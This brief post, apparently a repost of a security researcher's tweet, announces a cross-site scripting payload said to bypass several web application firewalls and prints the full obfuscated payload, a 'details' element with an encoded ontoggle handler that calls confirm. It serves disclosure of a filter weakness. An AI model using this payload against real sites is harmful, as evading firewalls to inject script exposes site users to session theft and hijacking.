A bypass for XSS has been discovered with the payload: <details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//. This bypass affects various WAF vendors. More details can be found in the blogpost.
For more insights, check out the original tweet here: https://twitter.com/Quantum3x2/status/1818716662411259993